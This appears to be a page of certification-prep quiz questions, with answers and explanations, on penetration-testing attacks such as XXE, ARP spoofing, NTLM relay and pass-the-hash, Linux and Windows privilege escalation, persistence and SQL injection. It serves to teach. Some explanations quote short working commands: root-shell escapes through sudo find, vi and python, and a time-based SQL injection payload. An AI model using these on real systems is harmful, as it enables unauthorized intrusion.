Courseiva

CCNA Attacks and Exploits Questions

71 of 146 questions · Page 2/2 · Attacks and Exploits · Answers revealed

76
Multi-Selectmedium

A penetration tester is exploiting a web application and discovers an XML External Entity (XXE) vulnerability. Which TWO attacks can be performed using XXE?

Select 2 answers
A.Remote code execution
B.Cross-Site Scripting (XSS)
C.Server-Side Request Forgery (SSRF)
D.SQL injection
E.File read
AnswersC, E

Server-Side Request Forgery (SSRF) is a direct impact of XXE because an attacker can define an external entity that points to an internal URL, forcing the server's XML parser to fetch that URL on the attacker's behalf. This lets the attacker scan internal network segments, access cloud instance metadata (e.g., IAM credentials), or interact with internal services that are not exposed externally. The server's outbound request is the core of the XXE attack, making SSRF a primary and correct classification.

Why this answer

XXE can be used to read local files via external entities and also to perform SSRF by making the server request internal resources.

77
MCQmedium

A penetration tester is performing an ARP spoofing attack using Bettercap to intercept traffic between a client and the gateway. What is the primary goal of this attack?

A.To perform a denial-of-service attack
B.To bypass firewall rules
C.To crack wireless passwords
D.To intercept and manipulate network traffic
AnswerD

ARP spoofing is the quintessential man-in-the-middle technique: the tester crafts forged ARP replies that poison the target's ARP cache, mapping their MAC address to the default gateway's IP. All outbound traffic is then forwarded to the attacker's machine, which can passively capture it (e.g., creds, sessions) or actively manipulate contents before relaying to the true gateway. This enables rogue access, session hijacking, and traffic injection while remaining invisible to the victim. Because passive sniffing on switched networks is normally nullified by MAC tables, ARP poisoning re-opens that interception path.

Why this answer

ARP spoofing allows the attacker to intercept traffic, enabling man-in-the-middle attacks to capture or modify data.

78
MCQmedium

A penetration tester is assessing a web application that uses a GraphQL endpoint. The tester wants to extract sensitive data by abusing the introspection system. Which of the following actions should the tester perform first?

A.Send a POST request with a query that includes __schema to retrieve the full schema
B.Use a CSRF attack to force an authenticated user to execute a GraphQL mutation
C.Brute-force the GraphQL endpoint with common query names to discover hidden fields
D.Perform a blind SQL injection on the GraphQL endpoint to dump the database
AnswerA

GraphQL introspection is enabled by default in many implementations, and querying the __schema field returns the entire schema, including types, fields, and arguments. This is the first step to map the API and identify sensitive queries or mutations that can be abused to extract data.

Why this answer

GraphQL introspection allows clients to query the __schema field to obtain the complete API schema. This is the fastest way to discover all available queries, mutations, and types, which can then be analyzed for sensitive data exposure. The other options are either different attack types or less efficient methods.

Exam trap

The trap here is assuming that GraphQL endpoints require SQL injection or brute-force to extract schema information, overlooking built-in introspection.

79
MCQeasy

During a web application test, the tester discovers a parameter that reflects user input in the response without sanitization. Which type of vulnerability is most likely present?

A.DOM-based XSS
B.Stored XSS
C.SQL injection
D.Reflected XSS
AnswerD

Reflected XSS is correct because the tester's parameter value is immediately included in the server's HTTP response without proper output encoding, creating a non-persistent vulnerability. An attacker can craft a malicious URL that, when clicked, causes the victim's browser to execute the injected script in the context of the application's origin. The immediate echo back in the response exactly matches the definition of reflected XSS, distinguishing it from stored XSS, which involves server-side persistence, and DOM-based XSS, which never involves the server response.

Why this answer

Reflected XSS occurs when user input is immediately reflected in the response without proper encoding or sanitization.

80
MCQmedium

After exploiting a Linux server, you need to pivot to a restricted network subnet. You have SSH access to the compromised server. Which command would create a SOCKS proxy on the server to route traffic through it?

A.ssh -L 1080:server:80 user@server
B.ssh -R 1080:server:80 user@server
C.ssh -J user@server:1080
D.ssh -D 1080 user@server
AnswerD

The -D flag enables dynamic port forwarding, establishing a SOCKS4/5 proxy on local port 1080. All traffic sent to this proxy is relayed through the SSH server, which can then reach any host in the server's network. This is the correct way to pivot, as it provides a flexible proxy that supports arbitrary destination addresses.

Why this answer

SSH -D creates a SOCKS tunnel for dynamic port forwarding, allowing pivoting.

81
MCQhard

A penetration tester is conducting an internal network assessment and has captured authentication traffic between a client and a file server. The tester observes that the client is using NTLMv1 authentication and wants to relay the captured response to another server to gain access. Which of the following conditions is MOST critical for a successful NTLM relay attack?

A.SMB signing must be disabled on the target server
B.The client must be a member of the Domain Admins group
C.The captured hash must be crackable to plaintext within a reasonable time
D.The target server must be running Windows Server 2019 or later
AnswerA

SMB signing cryptographically protects the integrity of SMB communications. If signing is enforced on the target server, the relayed authentication attempt will fail because the attacker cannot produce a valid signature. Disabling SMB signing on the target is therefore the single most critical prerequisite for a successful NTLM relay to SMB. Without it, the relayed credentials are rejected regardless of other factors.

Why this answer

For an NTLM relay to SMB to succeed, the target server must not require SMB signing. Signing ensures message integrity, and without the session key the attacker cannot sign relayed messages. If signing is disabled, the attacker can forward the NTLM authentication messages from the client to the target and authenticate as the client.

Other factors like hash crackability or account privileges are not prerequisites.

Exam trap

The trap here is believing that NTLM relay requires cracking the captured hash, when in fact the attack relays the authentication in real time and only needs SMB signing to be absent on the target.

82
MCQmedium

A penetration tester is performing a web application test and discovers that the application reflects user input in the response without proper sanitization. However, the tester notices that the input is handled client-side via JavaScript. Which type of XSS is this?

A.Stored XSS
B.DOM-based XSS
C.Reflected XSS
D.Blind XSS
AnswerB

DOM-based XSS is the correct answer because the vulnerable data flows from a DOM source (such as location.search, document.referrer, or window.name) to a dangerous DOM sink (like innerHTML, document.write, or eval) entirely within the browser's JavaScript execution context. The server response is static and unchanged; the malicious payload never travels through the server-side processing. The attack is triggered purely by how the client-side script handles attacker-controlled input, making it distinguishable from reflected or stored variants.

Why this answer

DOM-based XSS occurs when the vulnerability exists in client-side JavaScript rather than server-side reflection.

83
MCQmedium

During a penetration test, a tester captures NTLM hashes using Responder. Which of the following techniques would allow the tester to authenticate to a remote server without cracking the password?

A.LLMNR poisoning
B.Kerberoasting
C.Pass-the-hash
D.Rainbow table attack
AnswerC

Pass-the-hash is the correct answer because it directly uses the NTLM hash of a user's password as a credential to authenticate to remote services. In NTLM authentication, the hash itself is the secret, so an attacker who captures or extracts the hash can forge authentication requests without knowing the plaintext password. Tools like Mimikatz inject the hash into memory to obtain access, making this a direct hash-based authentication attack.

Why this answer

Pass-the-hash uses captured NTLM hashes to authenticate directly, bypassing the need to crack the password.

84
MCQmedium

A tester is exploiting a vulnerable web application and wants to perform a UNION-based SQL injection to extract data. Which condition is necessary for a successful UNION attack?

A.The database must be MySQL
B.The application must use GET parameters
C.The application must display error messages
D.The number of columns in both queries must match
AnswerD

A UNION statement in SQL combines the result sets of two or more SELECT queries, and a strict rule is that all queries must have the same number of columns. If the column counts differ, the database engine raises an error and the entire query fails, so the injected SELECT must exactly match the original query's column count. Attackers typically determine the correct number by using ORDER BY clauses or incrementally adding NULL columns until the UNION succeeds. This column-matching requirement is the fundamental constraint that must be satisfied for UNION injection to work.

Why this answer

UNION-based injection requires the same number of columns between the original query and the injected SELECT.

85
Multi-Selectmedium

A penetration tester is exploiting a web application and discovers an endpoint that allows an attacker to read arbitrary files on the server by manipulating XML input. The application uses an XML parser that does not disable external entities. Which TWO attacks can the tester perform using this vulnerability? (Choose TWO.)

Select 2 answers
A.SSRF via XXE
B.File read via XXE
C.Command injection
D.SQL injection
E.XSS
AnswersA, B

SSRF via XXE occurs when an XML external entity is used as a URL in its SYSTEM identifier, causing the web server to make an HTTP request on behalf of the attacker. Since the request originates from the server, it can reach internal resources like 127.0.0.1 or RFC 1918 addresses, or access cloud metadata endpoints such as the AWS instance metadata service at 169.254.169.254. This effectively bypasses network segmentation and firewalls, turning a simple XML parsing flaw into a server-side request forgery.

Why this answer

XXE (XML External Entity) allows file reads and can also lead to SSRF if the entity points to an internal URL. Command injection typically requires different input. SQL injection needs SQL syntax.

XSS is client-side.

86
Multi-Selectmedium

A penetration tester is conducting a web application test and finds a parameter that is vulnerable to XXE. Which THREE of the following actions can the tester perform using XXE?

Select 3 answers
A.Execute SQL injection
B.Cause a denial of service
C.Read sensitive files from the server
D.Perform SSRF to internal services
E.Bypass authentication
AnswersB, C, D

XXE can be weaponized for denial of service through entity expansion attacks, most famously the 'billion laughs' attack, in which nested entity references recursively expand to an exponentially large amount of memory or CPU usage. A single small request can exhaust available memory, crash the XML parser, or hang the application, requiring no authentication. Because these payloads are simple XML documents, they can be repeatedly sent by an unprivileged attacker, making resource exhaustion a primary and direct impact of XXE.

Why this answer

XXE can read files, perform SSRF, and cause denial of service. SQL injection is not typically a direct result of XXE.

87
MCQeasy

A penetration tester wants to crack NTLM hashes obtained from a Windows system. Which Hashcat mode should be used?

A.-m 1000
B.-m 22000
C.-m 0
D.-m 13100
AnswerA

-m 1000 is the correct Hashcat mode for NTLM hashes. NTLM hashes are computed as the MD4 digest of the user's password encoded in UTF-16LE, and the raw hash is a 128-bit value. This mode is commonly used when cracking password hashes dumped from the Windows SAM database or via tools like Mimikatz, as it targets the specific algorithm used for legacy Windows authentication. NTLM has a single MD4 round with no salt, which makes it extremely fast to crack on modern GPU hardware.

Why this answer

Hashcat mode 1000 is for NTLM hashes.

88
MCQhard

During a penetration test, a tester uses Metasploit to exploit a Windows service and gets a meterpreter session. The tester wants to dump hashes from the compromised system. Which meterpreter command should be used?

A.hashdump
B.shell
C.sysinfo
D.getsystem
AnswerA

hashdump is a Metasploit post-exploitation command that directly extracts LM/NTLM password hashes from the Windows Security Account Manager (SAM) database. It typically requires SYSTEM-level privileges, often obtained after successful privilege escalation. The extracted hashes can be saved to a file for offline cracking or used directly in pass-the-hash attacks. This is the specific, built-in command designed for credential harvesting from a compromised Windows host.

Why this answer

The hashdump command in meterpreter dumps the SAM database hashes.

89
MCQmedium

During a penetration test, the tester discovers a JWT token that uses the 'alg:none' header. Which attack does this vulnerability enable?

A.Key confusion attack
B.Signature bypass using alg:none
C.Algorithm substitution attack
D.Timing attack
AnswerB

Signature bypass using alg:none exploits a JWT header that sets the algorithm to 'none', which indicates to the parser that the token is unsecured and requires no signature. If the server's library does not explicitly reject 'none' tokens, an attacker can craft a valid-looking token with arbitrary claims simply by setting the header to { 'alg': 'none' } and omitting the signature segment. This effectively bypasses authentication and authorization checks because the token is accepted without any cryptographic proof of origin.

Why this answer

JWT with 'alg:none' allows an attacker to forge tokens without any signature, bypassing verification.

90
MCQeasy

A penetration tester wants to use Metasploit to exploit a remote service. After selecting an exploit module, which command is used to set the remote host IP address?

A.set LHOST
B.set RHOSTS
C.set TARGET
D.set LPORT
AnswerB

set RHOSTS is the correct command because it assigns the remote system's IP address or hostname that the exploit module will attack. This is a required option for essentially every remote exploit in Metasploit, and it can accept a single address, a CIDR range, or a list. Without RHOSTS, the module cannot initiate a connection to the victim, making all other payload settings meaningless.

Why this answer

In Metasploit, 'set RHOSTS' is used to specify the target IP address.

91
MCQeasy

A tester wants to crack a password hash using a wordlist combined with rules to generate variations. Which hashcat attack mode should be used?

A.-a 0 with -r
B.-a 3
C.-a 6
D.-a 1
AnswerA

In Hashcat, '-a 0' selects the dictionary attack, where each line from the wordlist is hashed and compared against the target hash. The '-r' flag specifies a rule file (e.g., best64.rule), which applies transformations such as case changes, appending/prepending characters, or leet-speak substitutions to each word, expanding the effective keyspace without altering the base wordlist. This combination is exactly what the tester needs to crack a hash while leveraging wordlist-derived passwords with rule-based mangling.

Why this answer

Mode 0 with rule files applies rules to a wordlist.

92
MCQmedium

After gaining a foothold on a Windows server, a tester wants to laterally move to another machine. The tester has obtained NTLM hashes and wants to execute commands remotely. Which tool is specifically designed for remote command execution using hashes via WMI?

A.evil-winrm
B.wmiexec
C.psexec
D.CrackMapExec
AnswerB

wmiexec is correct because it is an Impacket tool that leverages WMI (Windows Management Instrumentation) to remotely execute commands on a Windows target. It authenticates via NTLM hashes (pass-the-hash) and triggers a process through the Win32_Process.Create method, all over DCOM on port 135, making it the ideal choice for WMI-based lateral movement.

Why this answer

wmiexec.py (from Impacket) allows executing commands via WMI using NTLM hashes.

93
Multi-Selectmedium

A penetration tester has obtained a set of NTLM hashes from a Windows domain. The tester wants to perform lateral movement to other systems. Which TWO tools can be used for this purpose? (Select TWO.)

Select 2 answers
A.pth-winexe
B.CrackMapExec
C.Responder
D.Nmap
E.Hashcat
AnswersA, B

pth-winexe is a dedicated pass-the-hash utility that executes commands on remote Windows systems using NTLM hashes. It authenticates over SMB by injecting the hash directly into the authentication handshake, bypassing the need for a plaintext password. This makes it the most direct and specialized tool for lateral movement after hash acquisition.

Why this answer

CrackMapExec and pth-winexe both support pass-the-hash for lateral movement.

94
MCQmedium

A penetration tester gains a low-privilege shell on a Linux server. Using 'sudo -l', the tester finds that they can run '/usr/bin/vi' as root without a password. Which technique would the tester MOST likely use to escalate privileges?

A.Exploit a kernel vulnerability
B.Use vi to execute a shell as root
C.Modify a cron script
D.Perform PATH hijacking
AnswerB

If the low-privilege user is in the sudoers file with permissions to run vi as root, vi's interactive ex-mode command ':!/bin/bash' will launch a shell with root privileges. This works because vi passes the rest of the ex command line to the system shell, and since vi is running as root, the spawned bash inherits that elevated UID. This is a classic sudo misconfiguration and the intended escalation vector in this scenario.

Why this answer

GTFOBins lists vi as having a sudo escape, allowing privilege escalation by spawning a root shell. Other options are not directly applicable.

95
MCQmedium

While exploiting a Windows machine, a tester gains a shell with limited privileges. They attempt to escalate privileges using a tool that exploits the SeImpersonatePrivilege. Which tool is specifically designed for this purpose on modern Windows versions?

A.Mimikatz
B.JuicyPotato
C.PrintSpoofer
D.PowerUp
AnswerC

PrintSpoofer is the correct tool for Windows 10/Server 2016 and later when the compromised account holds SeImpersonatePrivilege. It works by tricking the Print Spooler service into impersonating the user via its named pipe, then using that impersonated token to launch a SYSTEM process (e.g., cmd.exe). Unlike JuicyPotato's DCOM-based NTLM relay, PrintSpoofer doesn't rely on outdated COM handshakes, making it far more reliable on modern builds. Its name is misleading—it's not exploiting a vulnerability in the spooler, but abusing an advertised impersonation feature to elevate privileges.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege on Windows 10/Server 2016+ to gain SYSTEM.

96
MCQhard

A penetration tester has gained a low-privilege shell on a Windows server and discovered that the SeImpersonatePrivilege is enabled. Which of the following tools would be most appropriate to escalate privileges to SYSTEM-level access?

A.pth-winexe
B.PrintSpoofer
C.Responder
D.CrackMapExec
AnswerB

PrintSpoofer is a local privilege escalation tool that abuses the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege commonly granted to Windows service accounts. It leverages the Print Spooler service's named pipe to capture a SYSTEM token and then impersonates it, spawning a process as NT AUTHORITY\SYSTEM. This directly escalates the existing low-privilege shell to full system privileges on the same host, making it the correct choice for this scenario.

Why this answer

SeImpersonatePrivilege allows token impersonation. Tools like PrintSpoofer exploit this to gain SYSTEM privileges. Potato attacks (JuicyPotato) also work, but PrintSpoofer is more modern and reliable.

97
Multi-Selectmedium

A penetration tester is conducting an internal network assessment. The tester wants to perform a man-in-the-middle attack to capture credentials. Which TWO tools can be used for ARP spoofing?

Select 2 answers
A.Ettercap
B.Responder
C.Nmap
D.Bettercap
E.Hashcat
AnswersA, D

Ettercap is a dedicated MITM framework that implements ARP poisoning natively, allowing an attacker to redirect LAN traffic by sending forged ARP replies that map the target's IP to the attacker's MAC. It supports both interactive and plugin-based attacks, including session hijacking and packet filtering, making it specifically suited for ARP-based interception.

Why this answer

Bettercap and Ettercap are both capable of ARP spoofing.

98
MCQeasy

A penetration tester is performing a network attack and wants to intercept traffic between two hosts on the same local network. Which technique should the tester use to redirect traffic through their machine?

A.DNS poisoning
B.LLMNR poisoning
C.ARP spoofing
D.SSL stripping
AnswerC

ARP spoofing is the correct technique for intercepting traffic on a local Ethernet network because ARP is stateless and lacks authentication. An attacker sends forged ARP replies to the target host and the default gateway, mapping the attacker's MAC address to the gateway's IP (and vice versa), which causes the target to send its frames to the attacker rather than directly to the gateway. This creates a man-in-the-middle position at the data-link layer, allowing the attacker to sniff, modify, or drop the traffic, and it is the foundational step for many subsequent attacks like session hijacking or credential theft.

Why this answer

ARP spoofing allows an attacker to associate their MAC address with the IP address of another host, intercepting traffic intended for that host.

99
MCQmedium

After gaining initial access to a Windows host, you want to escalate privileges by exploiting a service that runs as SYSTEM but has an unquoted service path. What is the attack vector?

A.Token impersonation
B.AlwaysInstallElevated
C.Unquoted service path
D.DLL hijacking
AnswerC

When the ImagePath value of a Windows service is an unquoted string containing spaces, the Service Control Manager (or CreateProcess) interprets each space as a potential path separator and tries successive prefixes as executable candidates. For example, 'C:\Program Files\MyApp\Service.exe' leads Windows to attempt 'C:\Program.exe' and 'C:\Program Files\MyApp\Service.exe' in order. If an attacker can write to a directory earlier in the path, they can place a malicious binary named to match a truncated component, such as 'My.exe' or 'Program.exe', which then executes with the service's privilege level when the service starts. This is the exact privilege escalation mechanism caused by an unquoted service path.

Why this answer

Unquoted service path vulnerability allows an attacker to place an executable in a path that the service will execute due to ambiguous path parsing.

100
MCQeasy

During an internal penetration test, a tester wants to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic. Which tool should the tester use?

A.ntlmrelayx
B.Bettercap
C.Hashcat
D.Responder
AnswerD

Responder operates by listening for Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) queries, then spoofing responses to redirect authentication attempts to the attacker’s machine, thereby capturing NTLMv2 challenge-response hashes. This directly satisfies the stem’s requirement to poison those specific protocols during an internal test, unlike tools that target different layers or authentication mechanisms.

Why this answer

Responder is specifically designed to respond to LLMNR and NBT-NS queries and capture NetNTLM hashes.

101
MCQeasy

A tester has exploited a Linux system and gained a low-privilege shell. The tester runs 'sudo -l' and sees that the current user can run /usr/bin/find as root without a password. Which privilege escalation technique should the tester use?

A.SUID binary exploitation
B.PATH manipulation
C.Kernel exploit
D.GTFOBins technique for find
AnswerD

This is a classic GTFOBins technique: when `sudo` permits a user to run `find` as root, the `-exec` or `-execdir` actions can execute arbitrary commands with elevated privileges. For example, `sudo find . -exec /bin/sh \;` spawns a root shell because `find` runs as root under sudo. GTFOBins enumerates such built-in command-execution mechanisms for common binaries, making this the correct method to escalate from the low-privileged user.

Why this answer

The find command can be used to execute other commands via its -exec parameter, allowing privilege escalation.

102
MCQeasy

A penetration tester wants to crack NTLM hashes captured during an internal test. Which hashcat mode should the tester use for NTLM hashes?

A.0
B.22000
C.1000
D.13100
AnswerC

Mode 1000 is the correct Hashcat mode for NTLM hashes, which are computed as MD4(UTF-16LE(password)). This mode directly tells Hashcat to treat the input as an NTLM hash and attempt password recovery using the correct algorithm, making it the only valid choice among the listed options for cracking captured NTLM hashes.

Why this answer

Hashcat mode 1000 is specifically for NTLM hashes.

103
MCQhard

During a penetration test, a tester gains access to a Linux system and runs 'sudo -l', which reveals that the user can run /usr/bin/python with root privileges without a password. Which resource should the tester consult to find a method to escalate privileges using this configuration?

A.PayloadsAllTheThings
B.GTFOBins
C.HackTricks
D.Exploit-DB
AnswerB

GTFOBins is the correct resource because it is a curated catalog of Unix binaries that can be abused to bypass local security restrictions, escalate privileges, or spawn shells — exactly what you need after running `sudo -l` and seeing a non-standard binary. It provides specific command snippets for each binary, categorized by functions like 'sudo', 'suid', and 'capabilities', so you can quickly match the binary you have access to with a privilege escalation vector. For a Linux penetration test, GTFOBins is the definitive reference for converting a misconfigured sudo entry into a root shell.

Why this answer

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions. It provides techniques for privilege escalation using binaries like python. GTFOBins is specifically for Unix privilege escalation.

104
Multi-Selectmedium

A penetration tester has obtained a meterpreter session on a Windows target. The tester wants to escalate privileges to SYSTEM and then dump password hashes. Which two meterpreter commands should the tester use in sequence? (Choose TWO.)

Select 2 answers
A.getuid
B.getsystem
C.shell
D.hashdump
E.sysinfo
AnswersB, D

The getsystem command invokes Meterpreter's built-in token impersonation and named-pipe duplication attacks to shift the session's security context to NT AUTHORITY\SYSTEM. This is the direct privilege escalation step in a typical post-exploitation sequence, bridging a limited or admin token to full system-level access. It does not return or display hash values; instead, it grants the elevated rights required by later commands such as hashdump.

Why this answer

First, use getsystem to attempt privilege escalation to SYSTEM (via token stealing or other techniques). Then, use hashdump to dump the SAM database hashes. getuid shows current user, sysinfo shows system info.

105
Multi-Selecthard

A penetration tester has gained initial access to a Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for persistence on Linux systems?

Select 3 answers
A.Installing an SSH authorized_key for the attacker
B.Adding a cron job that executes a reverse shell
C.Using schtasks to create a scheduled task
D.Modifying the Windows Registry Run key
E.Creating a systemd service that runs on boot
AnswersA, B, E

Installing an SSH authorized_key for the attacker is a Linux persistence technique that involves appending the attacker's public key to the target user's ~/.ssh/authorized_keys file. This permits the attacker to authenticate over SSH without a password, even after system reboots. It is stealthy because it requires no new process or scheduled task, blending in with normal user configuration files, and remains effective indefinitely unless explicitly removed.

Why this answer

Cron jobs, SSH authorized_keys, and systemd services are common persistence mechanisms.

106
Multi-Selectmedium

A penetration tester is using Metasploit to pivot from a compromised host to an internal network. Which THREE Metasploit features can facilitate pivoting?

Select 3 answers
A.Exploit/multi/handler
B.Metasploit route command
C.SSH local port forwarding
D.Autoroute post module
E.Metasploit socks proxy
AnswersB, D, E

The `route` command is the core Metasploit pivot primitive: `route add <subnet> <netmask> <session_id>` tells Metasploit's dispatcher to send any packets destined for that subnet through the specified session, typically a Meterpreter or shell session on a compromised host. This allows all built-in modules (scanners, exploits, auxiliary) to reach otherwise inaccessible internal networks via the session's existing connection. It is a manual, session-dependent routing entry, making it the correct classic answer for Metasploit-based pivoting.

Why this answer

The 'route' command adds routes through a session, and Metasploit's socks proxy (auxiliary/server/socks4a) can be used. Autoroute is a post module. Exploit/multi/handler is for reverse shells, not directly for pivoting.

Port forwarding via SSH is external to Metasploit.

107
Multi-Selecthard

A penetration tester has gained a foothold on a Windows host and wants to escalate privileges by abusing a misconfigured Windows service. Which TWO conditions would allow the tester to escalate privileges by replacing a service binary? (Choose two.)

Select 2 answers
A.The service is configured with a delayed automatic start type on a domain-joined host
B.The service runs under the NetworkService account with SeShutdownPrivilege enabled
C.The service's DACL grants the tester SERVICE_STOP and SERVICE_START but not SERVICE_CHANGE_CONFIG
D.The service's executable path points to a directory where the tester has write permissions
E.The service's unquoted path contains a space and an earlier directory in the path is writable
AnswersD, E

If the binary a service launches resides in a folder writable by the low-privilege user, the tester can replace or overwrite it with malicious code. When the service restarts, Windows executes the attacker-controlled binary in the service's security context, typically SYSTEM, yielding privilege escalation. The writable path is the core enabling condition for binary replacement.

Why this answer

Binary-replacement escalation requires the tester to influence which executable the service runs. That happens either when the service binary sits in a directory the tester can write to, or when an unquoted path with spaces lets Windows resolve a planted file from a writable earlier directory. Both conditions let attacker code execute in the service's privileged context, while the other options concern unrelated permissions or start settings.

Exam trap

The trap here is assuming any service-related permission or start configuration enables escalation, when binary replacement strictly requires control over the executable file or its path resolution.

108
MCQmedium

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester attempts to modify the 'alg' header to 'none' and sends the token. The server accepts the forged token. Which vulnerability is being exploited?

A.kid injection
B.alg:none attack
C.Algorithm confusion
D.Weak signing secret
AnswerB

By changing the JWT header's alg parameter to 'none' (or variants like 'None' or 'NONE'), the tester instructs the server that no signing algorithm is used. If the server's token-handling logic does not strictly enforce an allowlisted set of algorithms, it may accept the token with an empty signature, effectively bypassing signature verification. This is the classic JWT 'alg none' attack, which directly manipulates the algorithm field rather than the key or secret.

Why this answer

The 'alg:none' attack exploits JWT libraries that accept tokens without verifying signatures. This allows an attacker to forge tokens. Weak secret brute-force would crack the signing key; kid injection manipulates the key ID.

109
MCQmedium

A penetration tester is exploiting a SQL injection vulnerability in a web application. They want to extract data from the database without displaying it on the page. Which SQL injection technique should they use?

A.Blind time-based SQL injection
B.Stacked queries
C.UNION-based SQL injection
D.Error-based SQL injection
AnswerA

This attack works by injecting a conditional clause that pauses the database response only when a predicate evaluates true, such as `IF(ASCII(SUBSTR((SELECT database()),1,1))>100, SLEEP(5), 0)`. Since the application never directly prints the query output, the tester infers each character by measuring response-delay differences, extracting data one bit or one character at a time without needing visible rows or error messages. It is the only technique among the choices that succeeds when the application suppresses both output and errors, which matches the scenario described.

Why this answer

Blind SQL injection techniques like time-based or boolean-based are used when data is not returned directly in the response. Time-based uses delays to infer information.

110
Multi-Selectmedium

During a web application penetration test, a tester wants to identify vulnerabilities that allow unauthorized access to internal resources. Which TWO of the following are commonly exploited to access internal services?

Select 2 answers
A.Server-side request forgery (SSRF)
B.Cross-site scripting (XSS)
C.SQL injection (SQLi)
D.Command injection
E.XML external entity (XXE) injection
AnswersA, E

SSRF is the correct answer because it directly exploits the server's ability to fetch URLs. An attacker can manipulate server-side requests to target internal addresses (127.0.0.1, 10.0.0.0/8) or cloud metadata endpoints, thus accessing resources that are not exposed to the internet. This makes SSRF the primary technique for reaching internal services from a vulnerable web application.

Why this answer

SSRF can be used to access internal services by making the server request internal IPs. XXE can also be used for SSRF by using external entities to make HTTP requests. XSS is client-side, SQLi is database, command injection is OS commands.

111
MCQmedium

A tester finds that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester wants to access the cloud metadata endpoint to obtain instance credentials. Which IP address is commonly used for the cloud metadata service?

A.127.0.0.1
B.10.0.0.1
C.192.168.1.1
D.169.254.169.254
AnswerD

169.254.169.254 is the well-known link-local address used by major cloud providers (AWS, GCP, Azure, and others) to expose instance metadata, such as credentials, userdata, and network configuration. The address falls within the 169.254.0.0/16 APIPA block, making it non-routable and automatically reachable only from the instance itself. Because many cloud configurations historically permitted unauthenticated HTTP requests to this endpoint, it is the classic target for SSRF attacks, prompting cloud providers to introduce IMDSv2 with mandatory token-based access.

Why this answer

The cloud metadata endpoint is typically at 169.254.169.254 for AWS, GCP, and Azure.

112
MCQeasy

A penetration tester runs the following command: `hashcat -m 1000 -a 0 hashes.txt rockyou.txt`. What type of attack is being performed?

A.Brute-force attack
B.Hybrid attack
C.Rule-based attack
D.Dictionary attack
AnswerD

This is correct because Hashcat's -a 0 attack mode is the dictionary attack, where each word from a wordlist is tried as a password candidate. The -m parameter specifies the hash type (e.g., -m 0 for MD5), and the command relies solely on the supplied wordlist rather than generating combinations. Dictionary attacks are often the first choice in penetration testing because they exploit common and weak passwords efficiently.

Why this answer

The command uses mode 1000 (NTLM) and attack mode 0 (dictionary) with rockyou.txt wordlist. This is a dictionary attack.

113
MCQeasy

A penetration tester is conducting a network attack and wants to intercept traffic between two hosts on the same local network by spoofing ARP responses. Which tool is specifically designed for this purpose?

A.Bettercap
B.Responder
C.Hashcat
D.John the Ripper
AnswerA

Bettercap is a modular network attack framework with a built-in ARP spoofer module. By sending forged ARP replies, it can redirect traffic between a target host and the gateway, placing the tester in the middle of the conversation. This enables passive sniffing, session hijacking, and content injection, making it the correct choice for ARP-based MITM attacks.

Why this answer

Bettercap is a powerful tool that includes ARP spoofing capabilities for man-in-the-middle attacks on local networks.

114
MCQhard

During a web application test, a tester discovers a parameter that appears to be vulnerable to SQL injection. They want to extract data from a database using a technique that does not rely on visible output. Which type of SQL injection is most appropriate?

A.UNION-based SQL injection
B.Blind time-based SQL injection
C.Out-of-band SQL injection
D.Error-based SQL injection
AnswerB

Blind time-based SQL injection is the correct answer because it exfiltrates data without requiring any visible output, error message, or outbound network interaction. The attacker injects a conditional expression that triggers a database delay function, such as SLEEP(5) in MySQL, WAITFOR DELAY '0:0:5' in SQL Server, or pg_sleep(5) in PostgreSQL, when the condition evaluates true. By comparing the response time of true versus false conditions, the tester can pose boolean questions (e.g., 'Is the first character of the username A?') and iteratively reconstruct data. This works even when the application always returns the same generic page, making it the most reliable blind technique in a bandwidth-constrained test.

Why this answer

Blind SQL injection, specifically time-based, is used when no error or data is returned, allowing inference via time delays.

115
MCQeasy

During a penetration test, a tester uses Responder to capture NTLM hashes from a Windows network. Which of the following protocols is MOST commonly targeted by Responder for poisoning?

A.LLMNR
B.DNS
C.ICMP
D.HTTP
AnswerA

LLMNR, or Link-Local Multicast Name Resolution, is a protocol that Windows systems use to resolve hostnames on the local network when DNS queries fail. Responder works by listening for these multicast LLMNR queries and then spoofing a response, claiming to be the host the client is looking for. The client then attempts to authenticate to the attacker's machine, sending an NTLMv2 hash that the tester captures and can later crack or relay. This makes LLMNR the primary and correct protocol that Responder targets for hash capture in a penetration test.

Why this answer

Responder poisons LLMNR, NBT-NS, and mDNS to capture NTLM hashes. The other options are not primary targets.

116
Multi-Selecthard

A penetration tester is performing lateral movement in a Windows domain after compromising a workstation. Which THREE techniques can be used to move to another machine?

Select 3 answers
A.ARP spoofing
B.Evil-WinRM
C.WMIExec
D.SSH with captured credentials
E.PsExec
AnswersB, C, E

Evil-WinRM is a purpose-built post-exploitation and lateral movement tool that wraps the WinRM protocol (Windows Remote Management), typically operating over ports 5985/5986, to provide an interactive PowerShell session on a remote Windows host. It authenticates with valid credentials (often obtained via hash, LM, or NTLM pass-the-hash) and is optimized for penetration testing, supporting local and SMB upload/download, script execution, and memory injection. This strongly aligns with lateral movement because it allows an attacker to move from a compromised host to another using standard Windows remote management services, making it a correct answer.

Why this answer

PsExec, WMIExec, and Evil-WinRM are common tools for lateral movement in Windows environments.

117
Multi-Selectmedium

During a Linux privilege escalation attempt, a tester checks for misconfigurations that could allow running commands as root. Which of the following are potential vectors? (Select THREE.)

Select 3 answers
A.Unquoted service paths
B.Sudo misconfigurations
C.Writable scripts in cron jobs
D.DLL hijacking
E.SUID/SGID binaries
AnswersB, C, E

Sudo misconfigurations are a critical Linux privilege escalation vector because a user's sudo rights may allow running a command that can be leveraged to obtain a root shell, such as `sudo vim` or `sudo python -c 'import pty; pty.spawn("/bin/bash")'`. Misconfigurations include NOPASSWD entries, unsafe wildcard rules, or binary paths that can be replaced, and they directly expose unintended root-level execution. An attacker enumerates `sudo -l` to find such permissive entries.

Why this answer

SUID/SGID binaries, sudo misconfigurations, and writable cron scripts are common escalation vectors.

118
MCQmedium

A penetration tester is testing a web application and discovers an endpoint that returns XML data. The tester attempts to read /etc/passwd by injecting an external entity. Which type of attack is this?

A.XXE injection
B.Command injection
C.SSRF
D.SQL injection
AnswerA

